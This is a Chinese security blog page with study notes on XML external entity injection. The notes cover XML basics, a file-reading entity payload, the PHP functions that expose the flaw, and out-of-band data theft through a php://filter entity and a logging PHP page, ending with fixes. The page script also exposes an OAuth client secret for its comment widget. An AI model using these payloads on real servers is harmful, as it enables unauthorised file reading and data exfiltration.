<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"dtxharry.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":false,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":5,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="XXE定义, 如何寻找XXE">
<meta property="og:type" content="article">
<meta property="og:title" content="XXE实体注入">
<meta property="og:url" content="https://dtxharry.github.io/2023/08/21/XXE%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="dtxのRealm">
<meta property="og:description" content="XXE定义, 如何寻找XXE">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-08-21T08:42:23.000Z">
<meta property="article:modified_time" content="2023-08-21T15:04:22.593Z">
<meta property="article:author" content="dtxHarry">
<meta property="article:tag" content="XXE实体注入">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://dtxharry.github.io/2023/08/21/XXE%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>XXE实体注入 | dtxのRealm</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="dtxのRealm" type="application/atom+xml">
</head>



<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">dtxのRealm</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">HackerStuff</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">32</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">4</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">38</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/dtxharry" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://dtxharry.github.io/2023/08/21/XXE%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpeg">
      <meta itemprop="name" content="dtxHarry">
      <meta itemprop="description" content="随便写点自己的笔记">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dtxのRealm">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          XXE实体注入
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-08-21 16:42:23 / 修改时间：23:04:22" itemprop="dateCreated datePublished" datetime="2023-08-21T16:42:23+08:00">2023-08-21</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">web渗透</span></a>
                </span>
            </span>

          
            <div class="post-description">XXE定义, 如何寻找XXE</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="XXE定义"><a href="#XXE定义" class="headerlink" title="XXE定义"></a>XXE定义</h1><p>XXE   ==  xml外部实体注入 (被各种后端脚本调用)<br>          =&gt;XML只存数据,除此以外不会做任何事情 (像HTML | 传输数据 | 无预定义)<br>          =&gt; 外部实体<br>          =&gt;注入 [用户输入的数据被当做代码执行]</p>
<h1 id="XML定义"><a href="#XML定义" class="headerlink" title="XML定义"></a>XML定义</h1><p>XML 指可扩展标记语言（EXtensible Markup Language）<br>XML 是一种标记语言，很类似 HTMLXML 的设计宗旨是传输数据，而非显示数据<br>XML 标签没有被预定义。您需要自行定义标签。XML 被设计为具有自我描述性。<br>XML 是 W3C 的推荐标准</p>
<p>特点：<br>XML仅仅是纯文本，他不会做任何事情。<br>XML可以自己发明标签（允许定义自己的标签和文档结构）<br>XML 无所不在。</p>
<p>XML 是各种应用程序之间进行数据传输的最常用的工具，并且在信息存储和描述领域变得越来越流行</p>
<p>前端代码:<br>                <code>&lt;b&gt;&lt;/b&gt;</code>加粗<br>                <code>&lt;h1&gt;&lt;/h1&gt;</code>大标题<br>XML:<br>                <code>&lt;b&gt;&lt;/b&gt;</code> 名字而已<br>                <code>&lt;h1&gt;&lt;/h1&gt;</code>名字而已</p>
<h1 id="XML结构"><a href="#XML结构" class="headerlink" title="XML结构"></a>XML结构</h1><p>​    <code>&lt;?xml version=&quot;1.0&quot;?&gt;</code>     //文件头部分</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">scan</span> [<span class="meta">&lt;!ENTITY <span class="keyword">test</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;file:///c:/1.txt&quot;</span>&gt;</span>]&gt;</span></span><br><span class="line"></span><br><span class="line">//DTD部分（通过特殊的命令去其他文件读取信息,就是文件包含,使用的关键字为SYSTEM）</span><br><span class="line">其中,scan是标签</span><br><span class="line"></span><br><span class="line">//test相当于自定义了变量,让包含的文件写入到test实体中</span><br></pre></td></tr></table></figure>
<p>​    <code>&lt;scan&gt;&amp;test;&lt;/scan&gt;</code>            //XML部分,表示test实体作用范围为scan标签</p>
<h1 id="XXE的寻找"><a href="#XXE的寻找" class="headerlink" title="XXE的寻找"></a>XXE的寻找</h1><h2 id="1-代码审计"><a href="#1-代码审计" class="headerlink" title="1.代码审计"></a>1.代码审计</h2><h3 id="高危函数"><a href="#高危函数" class="headerlink" title="高危函数"></a>高危函数</h3><p>simplexml_load_string()  //调用xml字符串并转换为实体对象<br>simplexml_load_file()     //读取xml文件并转化为实体对象</p>
<h3 id="数据外带"><a href="#数据外带" class="headerlink" title="数据外带"></a>数据外带</h3><p>大部分的xxe是没有回显的，我们不知道是否调用,所以可以考虑把数据外带出来：<br>    1、获取信息<br>    2、发送信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">XSS平台：	</span><br><span class="line">	你打XSS到目标站点 -&gt; 有人访问后把数据传到平台 -&gt; 记录下来，等你来看</span><br><span class="line"></span><br><span class="line">XML: 请求一个你自己搭建的php文件，其他的文件。（你想要的数据给带出来）</span><br><span class="line">	 php文件记录请求的传参内容（记录文件）</span><br><span class="line">	 等你去看就可以了</span><br></pre></td></tr></table></figure>
<p>1.xml : 请求访问’<a target="_blank" rel="noopener" href="http://127.0.0.1/WWW/2.php?id=%file">http://127.0.0.1/WWW/2.php?id=%file</a>‘.</p>
<p>1.php : (1) 将”PHP://filter/read=convert.base64-encode/resource=1.txt”实体化为 %file对象;<br>            (2)让 % remote 包含 1.xml 并执行<br>            (3)将(1)和(2)变为一个xml 类型的字符串 ,再实体化为 test</p>
<p>2.PHP : file_put_contents(“3.txt”,$_GET[“id”],FILE_APPEND); //php中的写文件函数,把id传参扩展追             加到3.TXT的内容后</p>
<h4 id="file-正常情况下是网站不应该使用的协议"><a href="#file-正常情况下是网站不应该使用的协议" class="headerlink" title="file:/// 正常情况下是网站不应该使用的协议"></a>file:/// 正常情况下是网站不应该使用的协议</h4><p>PHP伪协议（PHP的内部协议）<br>php://filter/read=convert.base64-encode/resource=a.txt</p>
<h4 id="为什么要进行base64编码"><a href="#为什么要进行base64编码" class="headerlink" title="为什么要进行base64编码?"></a>为什么要进行base64编码?</h4><p>以免特殊字符影响传参 :  <code>http://XXXX.php?id=12#45&amp;id=67</code> 这里可能会被认为是锚点导致传参不完整</p>
<h2 id="2、看到数据包莫名其妙传递、返回XML代码-可以试试XXE"><a href="#2、看到数据包莫名其妙传递、返回XML代码-可以试试XXE" class="headerlink" title="2、看到数据包莫名其妙传递、返回XML代码,可以试试XXE"></a>2、看到数据包莫名其妙传递、返回XML代码,可以试试XXE</h2><h1 id="修复XXE的方法"><a href="#修复XXE的方法" class="headerlink" title="修复XXE的方法"></a>修复XXE的方法</h1><p>​    1、libxml_disable_entity_loader(true);  PHP的函数（禁止加载XML实体）<br>​    2、过滤SYSTEM关键字</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>dtxHarry
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://dtxharry.github.io/2023/08/21/XXE%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5/" title="XXE实体注入">https://dtxharry.github.io/2023/08/21/XXE实体注入/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/XXE%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5/" rel="tag"><i class="fa fa-tag"></i> XXE实体注入</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/08/21/%E8%87%AA%E5%8A%A8%E5%8C%96%E6%BC%8F%E6%89%ABxray/" rel="prev" title="自动化漏扫xray">
      <i class="fa fa-chevron-left"></i> 自动化漏扫xray
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/08/21/%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E/" rel="next" title="越权漏洞">
      越权漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#XXE%E5%AE%9A%E4%B9%89"><span class="nav-text">XXE定义</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XML%E5%AE%9A%E4%B9%89"><span class="nav-text">XML定义</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XML%E7%BB%93%E6%9E%84"><span class="nav-text">XML结构</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XXE%E7%9A%84%E5%AF%BB%E6%89%BE"><span class="nav-text">XXE的寻找</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="nav-text">1.代码审计</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%AB%98%E5%8D%B1%E5%87%BD%E6%95%B0"><span class="nav-text">高危函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%A4%96%E5%B8%A6"><span class="nav-text">数据外带</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#file-%E6%AD%A3%E5%B8%B8%E6%83%85%E5%86%B5%E4%B8%8B%E6%98%AF%E7%BD%91%E7%AB%99%E4%B8%8D%E5%BA%94%E8%AF%A5%E4%BD%BF%E7%94%A8%E7%9A%84%E5%8D%8F%E8%AE%AE"><span class="nav-text">file:&#x2F;&#x2F;&#x2F; 正常情况下是网站不应该使用的协议</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E8%BF%9B%E8%A1%8Cbase64%E7%BC%96%E7%A0%81"><span class="nav-text">为什么要进行base64编码?</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2%E3%80%81%E7%9C%8B%E5%88%B0%E6%95%B0%E6%8D%AE%E5%8C%85%E8%8E%AB%E5%90%8D%E5%85%B6%E5%A6%99%E4%BC%A0%E9%80%92%E3%80%81%E8%BF%94%E5%9B%9EXML%E4%BB%A3%E7%A0%81-%E5%8F%AF%E4%BB%A5%E8%AF%95%E8%AF%95XXE"><span class="nav-text">2、看到数据包莫名其妙传递、返回XML代码,可以试试XXE</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BF%AE%E5%A4%8DXXE%E7%9A%84%E6%96%B9%E6%B3%95"><span class="nav-text">修复XXE的方法</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="dtxHarry"
      src="/images/avatar.jpeg">
  <p class="site-author-name" itemprop="name">dtxHarry</p>
  <div class="site-description" itemprop="description">随便写点自己的笔记</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">32</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/dtxharry" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;dtxharry" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:dtxharry@gmail.com" title="E-Mail → mailto:dtxharry@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="https://instagram.com/dtxharry" title="Instagram → https:&#x2F;&#x2F;instagram.com&#x2F;dtxharry" rel="noopener" target="_blank"><i class="fab fa-instagram fa-fw"></i></a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">dtxHarry</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '9570c461857920411424',
      clientSecret: '821d08c71a9e130930a3b36dc0a8fc0ee0fedf68',
      repo        : 'dtxharry.github.io',
      owner       : 'dtxharry',
      admin       : ['dtxharry'],
      id          : 'f16229acc69eda3eb480460cff3ddd76',
        language: 'zh-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

    </div>



  






</body>
</html>
